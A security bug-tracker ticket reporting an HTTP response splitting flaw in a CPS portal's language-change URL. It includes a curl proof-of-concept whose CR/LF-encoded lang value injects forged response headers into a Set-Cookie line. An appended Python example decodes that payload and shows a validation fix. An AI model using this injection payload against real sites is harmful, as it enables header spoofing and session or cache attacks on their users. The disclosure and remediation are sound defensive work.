Ticket #2151 (new defect)

Opened 10 years ago

Last modified 10 years ago

HTTP response splitting condition

Reported by: gracinet Owned by: jmorliaguet
Priority: P1 Milestone: CPS 3.4.10
Component: CPSPortlets Version: TRUNK
Severity: major Keywords: security http header


On the language change URL, by putting CR/LF in the lang parameter, one can spoof the response headers. Curl session extract reproducing this:

> GET /cps/Localizer/cpsportlet_change_language?lang=Foobar%3f%0d%0aEvilHeader:%20EvilValue%2f1%2e2%2d3%0d%0aSecondEvilHeader:%20whatever" HTTP/1.1
> User-Agent: curl/7.16.4 (i386-apple-darwin9.0) libcurl/7.16.4 OpenSSL/0.9.7l zlib/1.2.3
> Host: localhost:8080
> Accept: */*
< HTTP/1.1 302 Moved Temporarily
< Server: Zope/(Zope 2.9.8-final, python 2.4.4, darwin) ZServer/1.1 CPS/CPS.3.5.1-devel
< Date: Thu, 06 May 2010 07:28:34 GMT
< Content-Length: 0
< Location: 
< Set-Cookie: LOCALIZER_LANGUAGE="Foobar?
< EvilHeader: EvilValue/1.2-3
< SecondEvilHeader: whatever""; Path=/cps
< Set-Cookie: _ZopeId="52057246A4X2YJE8GmY"; Path=/

Change History

comment:1 Changed 10 years ago by gracinet

Fixed in 3.5 default branch.

Need to backport to the 3.4 branch.

This Script (python) hasn't changed since 2005, so the same patch can be applied to existing projects.
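An added example (not the CPSPortlets patch the comment refers to) showing how the CR/LF in the decoded `lang` value splits the Set-Cookie line into the extra headers seen in the curl session above, beside a validation step that refuses such a value before it reaches a header; the helper names and the accepted language-tag pattern are assumptions.

```python
import re
from urllib.parse import unquote

# Constructed from the ticket's request: the percent-encoded lang parameter.
ENCODED_LANG = ("Foobar%3f%0d%0aEvilHeader:%20EvilValue%2f1%2e2%2d3"
                "%0d%0aSecondEvilHeader:%20whatever")

# Hypothetical acceptance policy: a plain language tag such as "fr", "fr_FR"
# or "pt-BR". Anything else, including control characters, is refused.
LANG_RE = re.compile(r"[A-Za-z]{2,3}(?:[_-][A-Za-z]{2,8})?")


def naive_set_cookie(name, value, path):
    """Vulnerable pattern: the untrusted value is interpolated as-is."""
    return 'Set-Cookie: %s="%s"; Path=%s' % (name, value, path)


def header_lines(raw_header):
    """Split a header string the way a client or proxy would: on CRLF."""
    return raw_header.split("\r\n")


def validate_lang(lang):
    """Hardened check: return the tag if it is well formed, else None.
    fullmatch is used so a trailing newline cannot slip past a '$' anchor."""
    if not isinstance(lang, str) or LANG_RE.fullmatch(lang) is None:
        return None
    return lang


def safe_set_cookie(name, value, path):
    """Emit the header only for a validated value; refuse everything else."""
    tag = validate_lang(value)
    if tag is None:
        raise ValueError("refusing to place an unvalidated value in a header")
    return naive_set_cookie(name, tag, path)


def demo():
    """Decode the ticket's payload, show the split, and show it being blocked."""
    lang = unquote(ENCODED_LANG)
    split = header_lines(naive_set_cookie("LOCALIZER_LANGUAGE", lang, "/cps"))
    try:
        safe_set_cookie("LOCALIZER_LANGUAGE", lang, "/cps")
        blocked = False
    except ValueError:
        blocked = True
    return split, blocked
```

Running `demo()` yields three lines from the single naive header, matching the three response lines in the ticket, while the hardened path raises before any header is built.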
